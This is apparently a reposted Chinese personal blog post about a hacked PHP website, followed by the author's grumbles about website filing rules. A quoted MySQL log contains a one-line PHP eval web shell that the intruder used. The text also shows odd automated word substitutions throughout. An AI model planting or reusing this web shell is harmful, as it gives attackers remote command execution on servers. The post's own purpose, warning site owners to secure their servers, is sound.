ToB企服应用市场:ToB评测及商务社交产业平台

标题: 一些盘算机琐屑知识随写（25年1月）-1 [打印本页]

作者: 千千梦丶琪 时间: 2025-1-12 19:17
标题: 一些盘算机琐屑知识随写（25年1月）-1
我原以为世界上有技术的那批人不会那么闲，我错了，被脚本真实了。
本日正隔着画画呢，手机突然弹出几条安全告警关照。

急遽打开服务器，发现标题不简单，直接关服务器重装系统.....
首先，不要以为小网站，没什么人看就不做防护

互联网不缺乏脚本小子和没啥事喜好攻击的黑客（在这个期间也不是没有可能是恶意的流窜ai），不要向我一样，以为这个网站没什么人看，什么掩护也不加，等到被爆破了才急遽修改，要是生产环境被这么搞一下那就很坏了。（各种意义上的）
由于我是php写的网站，php的毛病很多是历史遗留标题了，没有很好的代码规范的话那很容易被入侵。
就好比我没有加入文件验证之类的（我其时的想法：不会有人这么闲吧）。

我的思考

php这个语言毛病太多，对于我来说要么以后补课网络安全php这方面的课程，要么赶早换一门语言。
那名坏笔到底在我服务器干了什么呢？

事变已经发生了，气急败坏不如冷静分析。
首先是恶意上传一个php文件，然后查询了我所有的数据库文件
具体的代码如下

C:\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
60 Query select'<?php eval($_POST[admin]);?>'
60 Quit

复制代码

那很坏了
eval 函数在这种环境下假如被乐成执行，明显是具有恶意企图的，可能会导致服务器被攻击者长途控制、执行任意命令等安全风险。
第二个是一个木马病毒

太坏了

根据盘算机病毒百科来看这玩意是近几年的开发的病毒。

可能会修改系统的关键文件，造成系统崩溃或无法正常启动。
它可以监控用户的盘算机操纵，并盗取敏感信息，如银行账户暗码、个人隐私等。
以是说病毒什么七零八落并不是少了，而是坏笔们不直接打普通电脑了。

最终它干了什么

看样子是想把我服务器看成代理（？不确定。从它背面安装的内网穿透工具和代理工具来看是如许的。
然后正上厕所呢，公安给我打电话来了。
公安存案失败

之前icp存案根据腾讯云的提示操纵起来没有过于麻烦，就是写写表（个人是如许，企业的话多一些步调。）
然后icp过完考核居然还要公安部考核，就不能一起考核吗，真是徒增开发者的麻烦呢。
个人的网站icp存案和公安的表几乎没有什么差别，以是真的很难理解呢！
然后就打电话告诉我说不受理，去本身的户籍地办理去（icp是常驻地）
emm...???

感叹一些地方上的办事效率差，效率低了。
以是你以为我要告诉你个人开发者地址填写的时间要写户籍地icp写常驻地吗？
不啊我的朋友，个人博客要就不申请域名要不就一步到位买国外的好啦！就不用这么多麻烦的手续啦！

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)